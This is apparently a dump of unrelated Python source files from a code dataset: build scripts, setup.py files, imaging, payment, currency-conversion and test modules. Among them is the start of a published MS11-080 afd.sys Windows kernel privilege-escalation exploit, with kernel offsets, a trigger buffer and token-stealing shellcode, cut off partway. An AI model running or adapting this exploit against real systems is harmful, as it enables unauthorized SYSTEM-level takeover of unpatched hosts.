subprocess.check_call(['make', 'all-pdf'], stdout=open(os.devnull,
'wb'))
os.chdir(pwd)
epub_dest = self.j('.build', 'html', 'calibre.epub')
pdf_dest = self.j('.build', 'html', 'calibre.pdf')
shutil.copyfile(self.j('.build', 'epub', 'calibre.epub'), epub_dest)
shutil.copyfile(self.j('.build', 'latex', 'calibre.pdf'), pdf_dest)
subprocess.check_call(['ebook-convert', epub_dest,
epub_dest.rpartition('.')[0] + '.azw3',
'--page-breaks-before=/', '--disable-font-rescaling',
'--chapter=/'])
finally:
os.chdir(cwd)
def clean(self):
path = os.path.join(self.SRC, 'calibre', 'manual', '.build')
if os.path.exists(path):
shutil.rmtree(path)
class TagRelease(Command):
description = 'Tag a new release in bzr'
def run(self, opts):
self.info('Tagging release')
subprocess.check_call(('bzr tag '+__version__).split())
subprocess.check_call('bzr commit --unchanged -m'.split() + ['IGN:Tag release'])
|
SecWiki/windows-kernel-exploits
|
MS11-080/CVE-2011-2005.py
|
Python
|
mit
| 12,217 | 0.014161 |
################################################################################
######### MS11-080 - CVE-2011-2005 Afd.sys Privilege Escalation Exploit ########
######### Author: ryujin@offsec.com - Matteo Memelli ########
######### Spaghetti & Pwnsauce ########
######### yuck! 0xbaadf00d Elwood@mac&cheese.com ########
######### ########
######### Thx to dookie(lifesaver)2000ca, dijital1 and ronin ########
######### for helping out! ########
######### ########
######### To my Master Shifu muts: ########
######### "So that's it, I just need inner peace?" ;) ########
######### ########
######### Exploit tested on the following 32bits systems: ########
######### Win XPSP3 Eng, Win 2K3SP2 Standard/Enterprise Eng ########
################################################################################
from ctypes import (windll, CDLL, Structure, byref, sizeof, POINTER,
c_char, c_short, c_ushort, c_int, c_uint, c_ulong,
c_void_p, c_long, c_char_p)
from ctypes.wintypes import HANDLE, DWORD
import socket, time, os, struct, sys
from optparse import OptionParser
usage = "%prog -O TARGET_OS"
parser = OptionParser(usage=usage)
parser.add_option("-O", "--target-os", type="string",
action="store", dest="target_os",
help="Target OS. Accepted values: XP, 2K3")
(options, args) = parser.parse_args()
OS = options.target_os
if not OS or OS.upper() not in ['XP','2K3']:
parser.print_help()
sys.exit()
OS = OS.upper()
kernel32 = windll.kernel32
ntdll = windll.ntdll
Psapi = windll.Psapi
def findSysBase(drvname=None):
ARRAY_SIZE = 1024
myarray = c_ulong * ARRAY_SIZE
lpImageBase = myarray()
cb = c_int(1024)
lpcbNeeded = c_long()
drivername_size = c_long()
drivername_size.value = 48
Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded))
for baseaddy in lpImageBase:
drivername = c_char_p("\x00"*drivername_size.value)
if baseaddy:
Psapi.GetDeviceDriverBaseNameA(baseaddy, drivername,
drivername_size.value)
if drvname:
if drivername.value.lower() == drvname:
print "[+] Retrieving %s info..." % drvname
print "[+] %s base address: %s" % (drvname, hex(baseaddy))
return baseaddy
else:
if drivername.value.lower().find("krnl") !=-1:
print "[+] Retrieving Kernel info..."
print "[+] Kernel version:", drivername.value
print "[+] Kernel base address: %s" % hex(baseaddy)
return (baseaddy, drivername.value)
return None
print "[>] MS11-080 Privilege Escalation Exploit"
print "[>] Matteo Memelli - ryujin@offsec.com"
print "[>] Release D
|
ate 28/11/2011"
WSAGetLastError = windll.Ws2_32.WSAGetLastError
|
WSAGetLastError.argtypes = ()
WSAGetLastError.restype = c_int
SOCKET = c_int
WSASocket = windll.Ws2_32.WSASocketA
WSASocket.argtypes = (c_int, c_int, c_int, c_void_p, c_uint, DWORD)
WSASocket.restype = SOCKET
closesocket = windll.Ws2_32.closesocket
closesocket.argtypes = (SOCKET,)
closesocket.restype = c_int
connect = windll.Ws2_32.connect
connect.argtypes = (SOCKET, c_void_p, c_int)
connect.restype = c_int
class sockaddr_in(Structure):
_fields_ = [
("sin_family", c_short),
("sin_port", c_ushort),
("sin_addr", c_ulong),
("sin_zero", c_char * 8),
]
## Create our deviceiocontrol socket handle
client = WSASocket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP,
None, 0, 0)
if client == ~0:
raise OSError, "WSASocket: %s" % (WSAGetLastError(),)
try:
addr = sockaddr_in()
addr.sin_family = socket.AF_INET
addr.sin_port = socket.htons(4455)
addr.sin_addr = socket.htonl(0x7f000001) # 127.0.0.1
## We need to connect to a closed port, socket state must be CONNECTING
connect(client, byref(addr), sizeof(addr))
except:
closesocket(client)
raise
baseadd = c_int(0x1001)
MEMRES = (0x1000 | 0x2000)
PAGEEXE = 0x00000040
Zerobits = c_int(0)
RegionSize = c_int(0x1000)
written = c_int(0)
## This will trigger the path to AfdRestartJoin
irpstuff = ("\x41\x41\x41\x41\x42\x42\x42\x42"
"\x00\x00\x00\x00\x44\x44\x44\x44"
"\x01\x00\x00\x00"
"\xe8\x00" + "4" + "\xf0\x00" + "\x45"*231)
## Allocate space for the input buffer
dwStatus = ntdll.NtAllocateVirtualMemory(-1,
byref(baseadd),
0x0,
byref(RegionSize),
MEMRES,
PAGEEXE)
# Copy input buffer to it
kernel32.WriteProcessMemory(-1, 0x1000, irpstuff, 0x100, byref(written))
startPage = c_int(0x00020000)
kernel32.VirtualProtect(startPage, 0x1000, PAGEEXE, byref(written))
################################# KERNEL INFO ##################################
lpDriver = c_char_p()
lpPath = c_char_p()
lpDrvAddress = c_long()
(krnlbase, kernelver) = findSysBase()
hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1)
HalDispatchTable = kernel32.GetProcAddress(hKernel, "HalDispatchTable")
HalDispatchTable -= hKernel
HalDispatchTable += krnlbase
print "[+] HalDispatchTable address:", hex(HalDispatchTable)
halbase = findSysBase("hal.dll")
## WinXP SP3
if OS == "XP":
HaliQuerySystemInformation = halbase+0x16bba # Offset for XPSP3
HalpSetSystemInformation = halbase+0x19436 # Offset for XPSP3
## Win2k3 SP2
else:
HaliQuerySystemInformation = halbase+0x1fa1e # Offset for WIN2K3
HalpSetSystemInformation = halbase+0x21c60 # Offset for WIN2K3
print "[+] HaliQuerySystemInformation address:", hex(HaliQuerySystemInformation)
print "[+] HalpSetSystemInformation address:", hex(HalpSetSystemInformation)
################################# EXPLOITATION #################################
shellcode_address_dep = 0x0002071e
shellcode_address_nodep = 0x000207b8
padding = "\x90"*2
HalDispatchTable0x4 = HalDispatchTable + 0x4
HalDispatchTable0x8 = HalDispatchTable + 0x8
## tokenbkaddr = 0x00020900
if OS == "XP":
_KPROCESS = "\x44"
_TOKEN = "\xc8"
_UPID = "\x84"
_APLINKS = "\x88"
else:
_KPROCESS = "\x38"
_TOKEN = "\xd8"
_UPID = "\x94"
_APLINKS = "\x98"
restore_ptrs = "\x31\xc0" + \
"\xb8" + struct.pack("L", HalpSetSystemInformation) + \
"\xa3" + struct.pack("L", HalDispatchTable0x8) + \
"\xb8" + struct.pack("L", HaliQuerySystemInformation) + \
"\xa3" + struct.pack("L", HalDispatchTable0x4)
tokenstealing = "\x52" +\
"\x53" +\
"\x33\xc0" +\
"\x64\x8b\x80\x24\x01\x00\x00" +\
"\x8b\x40" + _KPROCESS +\
"\x8b\xc8" +\
"\x8b\x98" + _TOKEN + "\x00\x00\x00" +\
"\x89\x1d\x00\x09\x02\x00" +\
"\x8b\x80" + _APLINKS + "\x00\x00\x00" +\
"\x81\xe8" + _APLINKS + "\x00\x00\x00" +\
"\x81\xb8" + _UPID + "\x00\x00
|
Faggioni/powerlab
|
setup.py
|
Python
|
mit
| 405 | 0.004938 |
from setuptools import setup
setup(name='powerlab',
version='0.1',
description='Power System Tools',
url='https://github.com/Faggioni/powerlab',
author='Miguel Faggioni',
auth
|
or_email='migu
|
elfaggioni@gmail.com',
license='MIT',
packages=['powerlab'],
install_requires=[
'numpy',
],
entry_points= {
},
zip_safe=False)
|
mjirik/dicom2fem
|
setup.py
|
Python
|
bsd-3-clause
| 3,561 | 0.000842 |
from setuptools import setup, find_packages # Always prefer setuptools over distutils
from os import path
here = path.abspath(path.dirname(__file__))
setup(
name='dicom2fem',
description='Generation of finite element meshes from DICOM images',
long_desctioption="Generation of finite element meshes using computed " +
"tomography scans. Segmentation is based on the graph cut algorithm.",
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# http://packaging.python.org/en/latest/tutorial.html#version
version='1.1.13',
url='https://github.com/vlukes/dicom2fem',
author='Vladimir Lukes',
author_email='vlukes@kme.zcu.cz',
license='MIT',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Scientific/Engineering :: Bio-Informatics',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: BSD License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
# 'Programming Language :: Python :: 2',
# 'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
# 'Programming Language :: Python :: 3',
# 'Programming Language :: Python :: 3.2',
# 'Programming Language :: Python :: 3.3',
# 'Programming Language :: Python :: 3.4',
],
# What does your project relate to?
keywords='fem dicom',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=['dist', 'docs', 'tests*']),
# List run-time dependencies here. These will be installed by pip when your
# project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/technical.html#install-requires-vs-requirements-files
install_requires=[
# 'numpy', 'imcut'
],
# dependency_links=['https://github.com/mjirik/gco_python'],
# If there are data files included in your packages that need to be
# installed, specify them here. If using Python 2.6 or less, then these
# have to be included in MANIFEST.in as well.
# package_data={
# 'sample': ['package_data.dat'],
# },
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages.
# see http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
# data_files
|
=[('my_data', ['data/data_file'])],
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
# entry_points={
# 'console_scripts': [
# 'sample=sample:main',
# ],
# },
|
)
|
DanteOnline/free-art
|
venv/lib/python3.4/site-packages/PIL/ImageTransform.py
|
Python
|
gpl-3.0
| 2,878 | 0 |
#
# The Python Imaging Library.
# $Id$
#
# transform wrappers
#
# History:
# 2002-04-08 fl Created
#
# Copyright (c) 2002 by Secret Labs AB
# Copyright (c) 2002 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#
from PIL import Image
class Transform(Image.ImageTransformHandler):
def __init__(self, data):
self.data = data
def getdata(self):
return self.method, self.data
def transform(self, size, image, **options):
# can be overridden
method, data = self.getdata()
return image.transform(size, method, data, **options)
class AffineTransform(Transform):
"""
Define an affine image transform.
This function takes a 6-tuple (a, b, c
|
, d, e, f) which contain the first
two rows from an affine transform matrix. For each pixel (x, y) in the
output image, the new value is taken from a position (a x + b y + c,
d x + e y + f) in the input image, rounded to nearest pixel.
This function can be used to scale, translate, rotate, and shear the
original image.
@def AffineTransform(matrix)
@param
|
matrix A 6-tuple (a, b, c, d, e, f) containing the first two rows
from an affine transform matrix.
@see Image#Image.transform
"""
method = Image.AFFINE
class ExtentTransform(Transform):
"""
Define a transform to extract a subregion from an image.
Maps a rectangle (defined by two corners) from the image to a rectangle of
the given size. The resulting image will contain data sampled from between
the corners, such that (x0, y0) in the input image will end up at (0,0) in
the output image, and (x1, y1) at size.
This method can be used to crop, stretch, shrink, or mirror an arbitrary
rectangle in the current image. It is slightly slower than crop, but about
as fast as a corresponding resize operation.
@def ExtentTransform(bbox)
@param bbox A 4-tuple (x0, y0, x1, y1) which specifies two points in the
input image's coordinate system.
@see Image#Image.transform
"""
method = Image.EXTENT
class QuadTransform(Transform):
"""
Define a quad image transform.
Maps a quadrilateral (a region defined by four corners) from the image to a
rectangle of the given size.
@def QuadTransform(xy)
@param xy An 8-tuple (x0, y0, x1, y1, x2, y2, y3, y3) which contain the
upper left, lower left, lower right, and upper right corner of the
source quadrilateral.
@see Image#Image.transform
"""
method = Image.QUAD
class MeshTransform(Transform):
"""
Define a mesh image transform. A mesh transform consists of one or more
individual quad transforms.
@def MeshTransform(data)
@param data A list of (bbox, quad) tuples.
@see Image#Image.transform
"""
method = Image.MESH
# End of file
|
Chibuzor-IN/python-paystack
|
python_paystack/objects/plans.py
|
Python
|
mit
| 1,566 | 0.001916 |
'''
plans.py
'''
from forex_python.converter import CurrencyCodes
from .base import Base
class Plan(Base):
'''
Plan class for making payment plans
'''
interval = None
name = None
amount = None
plan_code = None
currency = None
id = None
send_sms = True
send_invoices = True
description = None
__interval_values = ('hourly', 'daily', 'weekly', 'monthly', 'annually')
def __init__(self, name, interval, amount, currency='NGN', plan_code=None,
id=None, send_sms=None, send_invoices=None, description=None):
super().__init__()
#Check if currency supplied is valid
if not CurrencyCodes().get_symbol(currency.upper()):
raise ValueError("Invalid currency supplied")
if interval.lower() not in self.__interval_values:
raise ValueError("Interval should be one of 'hourly',"
"'daily', 'weekly', 'monthly','annually'"
|
)
try:
amount = int(amount)
except ValueError:
raise ValueError("Invalid amount")
else:
self.interval = interval.lower()
self.name = name
self.interval = interval
self.amount = amount
self.currency = currency
self.plan_code = plan_code
self.id = id
self.send_sms
|
= send_sms
self.send_invoices = send_invoices
self.description = description
def __str__(self):
return "%s plan" % self.name
|
SerSamgy/PhotoLoader
|
manage.py
|
Python
|
mit
| 254 | 0 |
#!/usr/bin/env pyt
|
hon
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MOD
|
ULE", "PhotoLoader.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
XanderXAJ/mastercardConvert
|
mastercardConvert.py
|
Python
|
gpl-3.0
| 2,462 | 0.004874 |
#!/usr/bin/env python
import argparse
import logging
from functools import partial
from domain import date, transaction
# Parse command line arguments
parser = argparse.ArgumentParser(description="Convert currency using MasterCard exchange rates",
epilog='If no date is specified, the most recent date with rates is used.')
parser.add_argument('from_quantity', type=float, help='Quantity of from_currency used in transaction')
parser.add_argument('from_currency', type=str.upper,
help='The currency to convert from, i.e. the transaction currency, e.g. GBP, USD, JPY')
parser.add_argument('to_currency', type=str.upper,
help='The currency to convert to, i.e. the
|
card currency, e.g. GBP, USD, JPY')
parser.add_argument('-d', '--date',
help='Day the exchange was made in format YYYY-MM-DD. Only today and yesterday appear to be supported by MasterCard. Defaults to most recent day with rates.')
parser.add_argument('--log_level', help='Set logging level'
|
, default='WARNING',
type=str.upper,
choices=['CRITICAL', 'ERROR', 'WARNING', 'INFO', 'DEBUG'])
parser.add_argument('-t', '--today', action='store_true',
help='Use today\'s exchange rates. This may error if today\'s rates have not been uploaded')
parser.add_argument('-y', '--yesterday', action='count', default=0,
help='Uses yesterday\'s exchange rates. Repeat to go further back in time')
args = parser.parse_args()
logging.basicConfig(level=logging.getLevelName(args.log_level))
logging.debug(args)
# Figure out which date to use
if args.date is not None: # User-specified date
settle = partial(transaction.settle, exchange_rate_date=date.parse(args.date))
elif args.today: # Today
settle = partial(transaction.settle, exchange_rate_date=date.date_today())
elif args.yesterday > 0: # Yesterday (note that yesterday can be specified multiple times)
settle = partial(transaction.settle, exchange_rate_date=date.date_n_days_ago(args.yesterday))
else: # Use most recent date with published rates, discover date from initial MasterCard call
settle = transaction.settle_latest
# Get card amount from MasterCard
transaction = settle(
transaction_amount=args.from_quantity,
transaction_currency=args.from_currency,
card_currency=args.to_currency,
)
# Output conversion
print(transaction['card_amount'])
|
mRokita/DPLib
|
dplib/parse.py
|
Python
|
agpl-3.0
| 3,545 | 0.005079 |
# DPLib - Asynchronous bot framework for Digital Paint: Paintball 2 servers
# Copyright (C) 2017 Michał Rokita
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
A module for parsing DP data
""
|
"
CHAR_TAB = ['\0', '-', '-', '-', '_', '*', 't', '.', 'N', '-', '\n', '#', '.', '>', '*', '*',
'[', ']', '@', '@', '@', '@', '@', '@', '<', '>', '.', '-', '*', '-', '-', '-',
' ', '!', '\"', '#', '$', '%', '&', '\'', '(', ')', '*', '+', ',', '-', '.', '/',
'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', ':', ';', '<', '=', '>', '?',
'@', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
|
'N', 'O',
'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '[', '\\', ']', '^', '_',
'`', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o',
'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '{', '|', '}', '~', '<',
'(', '=', ')', '^', '!', 'O', 'U', 'I', 'C', 'C', 'R', '#', '?', '>', '*', '*',
'[', ']', '@', '@', '@', '@', '@', '@', '<', '>', '*', 'X', '*', '-', '-', '-',
' ', '!', '\"', '#', '$', '%', '&', '\'', '(', ')', '*', '+', ',', '-', '.', '/',
'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', ':', ';', '<', '=', '>', '?',
'@', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O',
'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '[', '\\', ']', '^', '_',
'`', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O',
'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '{', '|', '}', '~', '<']
def decode_ingame_text(text):
"""
Removes special chars from ingame messages/nicks
:param text: Text to decode
:return: Decoded text
"""
cleaned_text = ""
skip_next = False
for i in text:
char_ascii = ord(i)
# 134-underline, 135-italic, 136-color
if char_ascii == 134 or char_ascii == 135 or char_ascii == 136 or skip_next: # Remove underline, italic symbols
if char_ascii == 136:
skip_next = True
else:
skip_next = False
else:
cleaned_text = cleaned_text + CHAR_TAB[char_ascii]
skip_next = False
return cleaned_text
def render_text(text):
"""
Renders some text with formatting to a DP message.
Replaces {C} with color char (ASCII 136), {U} with underline (ASCII 134) and {I} with italic (ASCII 135)
:param text: Text to render
:type text: str
:return: DP message
:rtype: str
"""
return text.format(C=chr(136), U=chr(134), I=chr(135))
def escape_braces(string):
"""
Escapes braces, use for user-input in :func:`render_text`
:param string: string to escape
:return: escaped string
"""
return string.replace('{', '{{').replace('}', '}}')
|
ztane/zsos
|
userland/lib/python2.5/ctypes/test/test_slicing.py
|
Python
|
gpl-3.0
| 3,845 | 0.00156 |
import unittest
from ctypes import *
import _ctypes_test
class SlicesTestCase(unittest.TestCase):
def test_getslice_cint(self):
a = (c_int * 100)(*xrange(1100, 1200))
b = range(1100, 1200)
self.failUnlessEqual(a[0:2], b[0:2])
self.failUnlessEqual(len(a), len(b))
self.failUnlessEqual(a[5:7], b[5:7])
self.failUnlessEqual(a[-1], b[-1])
self.failUnlessEqual(a[:], b[:])
a[0:5] = range(5, 10)
self.failUnlessEqual(a[0:5], range(5, 10))
def test_setslice_cint(self):
a = (c_int * 100)(*xrange(1100, 1200))
b = range(1100, 1200)
a[32:47] = range(32, 47)
self.failUnlessEqual(a[32:47], range(32, 47))
from operator import setslice
# TypeError: int expected instead of str instance
self.assertRaises(TypeError, setslice, a, 0, 5, "abcde")
# TypeError: int expected instead of str instance
self.assertRaises(TypeError, setslice, a, 0, 5, ["a", "b", "c", "d", "e"])
# TypeError: int expected instead of float instance
self.assertRaises(TypeError, setslice, a, 0, 5, [1, 2, 3, 4, 3.14])
# ValueError: Can only assign sequence of s
|
ame size
self.assertRaises(ValueError, setslice, a, 0, 5, range(32))
def test_char_ptr(self):
s = "abcdefghijklmnopqrstuvwxyz"
dll = CDLL(_ctypes_test.__file__)
dll.my_strdup.restype = POINTER(c_char)
dll.my_free.restype = None
res = dll.my_
|
strdup(s)
self.failUnlessEqual(res[:len(s)], s)
import operator
self.assertRaises(TypeError, operator.setslice,
res, 0, 5, u"abcde")
dll.my_free(res)
dll.my_strdup.restype = POINTER(c_byte)
res = dll.my_strdup(s)
self.failUnlessEqual(res[:len(s)], range(ord("a"), ord("z")+1))
dll.my_free(res)
def test_char_ptr_with_free(self):
dll = CDLL(_ctypes_test.__file__)
s = "abcdefghijklmnopqrstuvwxyz"
class allocated_c_char_p(c_char_p):
pass
dll.my_free.restype = None
def errcheck(result, func, args):
retval = result.value
dll.my_free(result)
return retval
dll.my_strdup.restype = allocated_c_char_p
dll.my_strdup.errcheck = errcheck
try:
res = dll.my_strdup(s)
self.failUnlessEqual(res, s)
finally:
del dll.my_strdup.errcheck
def test_char_array(self):
s = "abcdefghijklmnopqrstuvwxyz\0"
p = (c_char * 27)(*s)
self.failUnlessEqual(p[:], s)
try:
c_wchar
except NameError:
pass
else:
def test_wchar_ptr(self):
s = u"abcdefghijklmnopqrstuvwxyz\0"
dll = CDLL(_ctypes_test.__file__)
dll.my_wcsdup.restype = POINTER(c_wchar)
dll.my_wcsdup.argtypes = POINTER(c_wchar),
dll.my_free.restype = None
res = dll.my_wcsdup(s)
self.failUnlessEqual(res[:len(s)], s)
import operator
self.assertRaises(TypeError, operator.setslice,
res, 0, 5, u"abcde")
dll.my_free(res)
if sizeof(c_wchar) == sizeof(c_short):
dll.my_wcsdup.restype = POINTER(c_short)
elif sizeof(c_wchar) == sizeof(c_int):
dll.my_wcsdup.restype = POINTER(c_int)
elif sizeof(c_wchar) == sizeof(c_long):
dll.my_wcsdup.restype = POINTER(c_long)
else:
return
res = dll.my_wcsdup(s)
self.failUnlessEqual(res[:len(s)-1], range(ord("a"), ord("z")+1))
dll.my_free(res)
################################################################
if __name__ == "__main__":
unittest.main()
|
avalentino/PyTables
|
tables/indexes.py
|
Python
|
bsd-3-clause
| 5,884 | 0 |
"""Here is defined the IndexArray class."""
from bisect import bisect_left, bisect_right
from .node import NotLoggedMixin
from .carray import CArray
from .earray import EArray
from . import indexesextension
# Declarations for inheriting
class CacheArray(indexesextension.CacheArray, NotLoggedMixin, EArray):
"""Container for keeping index caches of 1st and 2nd level."""
# Class identifier.
_c_classid = 'CACHEARRAY'
class LastRowArray(indexesextension.LastRowArray, NotLoggedMixin, CArray):
"""Container for keeping sorted and indices values of last row of an
index."""
# Class identifier.
_c_classid = 'LASTROWARRAY'
class IndexArray(indexesextension.IndexArray, NotLoggedMixin, EArray):
"""Represent the index (sorted or reverse index) dataset in HDF5 file.
All NumPy typecodes are supported except for complex datatypes.
Parameters
----------
parentnode
The Index class from which this object will hang off.
.. versionchanged:: 3.0
Renamed from *parentNode* to *parentnode*.
name : str
The name of this node in its parent group.
atom
An Atom object representing the shape and type of the atomic objects to
be saved. Only scalar atoms are supported.
title
Sets a TITLE attribute on the array entity.
filters : Filters
An instance of the Filters class that provides information about the
desired I/O filters to be applied during the life of this object.
byteorder
The byteroder of the data on-disk.
"""
# Class identifier.
_c_classid = 'INDEXARRAY'
@property
def chunksize(self):
"""The chunksize for this object."""
return self.chunkshape[1]
@property
def slicesize(self):
"""The slicesize for this object."""
return self.shape[1]
def __init__(self, parentnode, name,
atom=None, title="",
filters=None, byteorder=None):
"""Create an IndexArray instance."""
self._v_pathname = parentnode._g_join(name)
if atom is not None:
# The shape and chunkshape needs to be fixed here
if name == "sorted":
reduction = parentnode.reduction
shape = (0, parentnode.slicesize // reduction)
chunkshape = (1, parentnode.chunksize // reduction)
else:
shape = (0, parentnode.slicesize)
chunkshape = (1, parentnode.chunksize)
else:
# The shape and chunkshape will be read from disk later on
shape = None
chunkshape = None
super().__init__(
parentnode, name, atom, shape, title, filters,
chunkshape=chunkshape, byteorder=byteorder)
# This version of searchBin uses both ranges (1st level) and
# bounds (2nd level) caches. It uses a cache for boundary rows,
# but not for 'sorted' rows (this is only supported for the
# 'optimized' types).
def _search_bin(self, nrow, item):
item1, item2 = item
result1 = -1
result2 = -1
|
hi = self.shape[1]
ranges = self._v_parent.rvcache
boundscache = self.boundscache
# First, look at the beginning of the slice
begin = ranges[nrow, 0]
# Look for items at the beginning of sorted slices
if item1 <= begin:
result1 = 0
if item2 < begin:
result2 = 0
if result1 >=
|
0 and result2 >= 0:
return (result1, result2)
# Then, look for items at the end of the sorted slice
end = ranges[nrow, 1]
if result1 < 0:
if item1 > end:
result1 = hi
if result2 < 0:
if item2 >= end:
result2 = hi
if result1 >= 0 and result2 >= 0:
return (result1, result2)
# Finally, do a lookup for item1 and item2 if they were not found
# Lookup in the middle of slice for item1
chunksize = self.chunksize # Number of elements/chunksize
nchunk = -1
# Try to get the bounds row from the LRU cache
nslot = boundscache.getslot(nrow)
if nslot >= 0:
# Cache hit. Use the row kept there.
bounds = boundscache.getitem(nslot)
else:
# No luck with cached data. Read the row and put it in the cache.
bounds = self._v_parent.bounds[nrow]
size = bounds.size * bounds.itemsize
boundscache.setitem(nrow, bounds, size)
if result1 < 0:
# Search the appropriate chunk in bounds cache
nchunk = bisect_left(bounds, item1)
chunk = self._read_sorted_slice(nrow, chunksize * nchunk,
chunksize * (nchunk + 1))
result1 = indexesextension._bisect_left(chunk, item1, chunksize)
result1 += chunksize * nchunk
# Lookup in the middle of slice for item2
if result2 < 0:
# Search the appropriate chunk in bounds cache
nchunk2 = bisect_right(bounds, item2)
if nchunk2 != nchunk:
chunk = self._read_sorted_slice(nrow, chunksize * nchunk2,
chunksize * (nchunk2 + 1))
result2 = indexesextension._bisect_right(chunk, item2, chunksize)
result2 += chunksize * nchunk2
return (result1, result2)
def __str__(self):
"""A compact representation of this class"""
return f"IndexArray(path={self._v_pathname})"
def __repr__(self):
"""A verbose representation of this class."""
return f"""{self}
atom = {self.atom!r}
shape = {self.shape}
nrows = {self.nrows}
chunksize = {self.chunksize}
slicesize = {self.slicesize}
byteorder = {self.byteorder!r}"""
|
lmzintgraf/MultiMAuS
|
experiments/run_multimaus.py
|
Python
|
mit
| 2,970 | 0.001684 |
from authenticators.simple_authenticators import RandomAuthenticator, \
HeuristicAuthenticator, OracleAuthenticator, NeverSecondAuthenticator, \
AlwaysSecondAuthenticator
from simulator import parameters
from simulator.transaction_model import TransactionModel
from experiments import rewards
import numpy as np
import matplotlib.pyplot as plt
from experiments import result_handling
def run_single():
# get the parameters for the simulation
params = parameters.get_default_parameters()
params['init_satisfaction'] = 0.9
# increase the probability of making another transaction
new_stay_prob = [0.8, 0.5]
print('changing stay prob from', params['stay_prob'], 'to', new_stay_prob)
params['stay_prob'] = new_stay_prob
plt.figure(figsize=(10, 5))
for a in ['random', 'oracle', 'never_second', 'heuristic', 'always_second']:
# the authenticator
authenticator = get_authenticator(a)
# initialise transaction model
model = TransactionModel(params, authenticator)
# run the simulation until termination
while not model.terminated:
model.step()
# get the collected data
agent_vars = model.log_collector.get_agent_vars_dataframe()
agent_vars.index = agent_vars.index.droplevel(1)
model_vars = model.log_collector.get_model_vars_dataframe()
# save the results
result_handling.save_results(model)
reward_fraud = rewards.money_lost_per_timestep(agent_vars)
reward_genuine = rewards.money_made_per_timestep(agent_vars)
monetary_rewards = rewards.monetary_reward_per_timestep(agent_vars)
true_satisfactions = rewards.satisfaction_per_timestep(model_vars)
# plt.subplot(1, 4, 1)
plt.ylabel('revenue (total)')
plt.plot(range(len(monetary_rewards)), np.cumsum(monetary_rewards), label=a)
plt.legend()
# plt.subplot(1, 4, 2)
# plt.ylabel('cumulative satisfaction')
# plt.plot(range(len(true_satisfactions)), np.cumsum(true_satisfactions), label=a)
#
# plt.subplot(1, 4, 3)
# plt.ylabel('revenue (money lost by fraud)')
# plt.plot(range(len(true_satisfactions)), np.cumsum(true_satisfactions), label=a)
#
# plt.subplot(1, 4, 4)
# plt.ylabel('revenue (money gained by genuine transactions)')
# plt.plot(range(len(true_satisfactions)), np.cumsum(true_satisfactions), label=a)
plt.tight_layout()
plt.show()
def get_authenticator(auth_type):
if auth_type
|
== 'random':
return RandomAuthenticator()
elif auth_type == 'heuristic':
return HeuristicAuthenticator(50)
elif auth_type
|
== 'oracle':
return OracleAuthenticator()
elif auth_type == 'never_second':
return NeverSecondAuthenticator()
elif auth_type == 'always_second':
return AlwaysSecondAuthenticator()
if __name__ == '__main__':
run_single()
|
devdattakulkarni/test-solum
|
solum/tests/api/handlers/test_workflow.py
|
Python
|
apache-2.0
| 4,365 | 0.000229 |
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. Yo
|
u may obtain
# a copy of the License at
#
# http://www.apache.org/li
|
censes/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from solum.api import auth
from solum.api.handlers import workflow_handler
from solum.openstack.common.fixture import config
from solum.tests import base
from solum.tests import fakes
from solum.tests import utils
@mock.patch('solum.objects.registry')
class TestWorkflowHandler(base.BaseTestCase):
def setUp(self):
super(TestWorkflowHandler, self).setUp()
self.ctx = utils.dummy_context()
self.CONF = self.useFixture(config.Config())
self.CONF.config(auth_uri='http://fakeidentity.com',
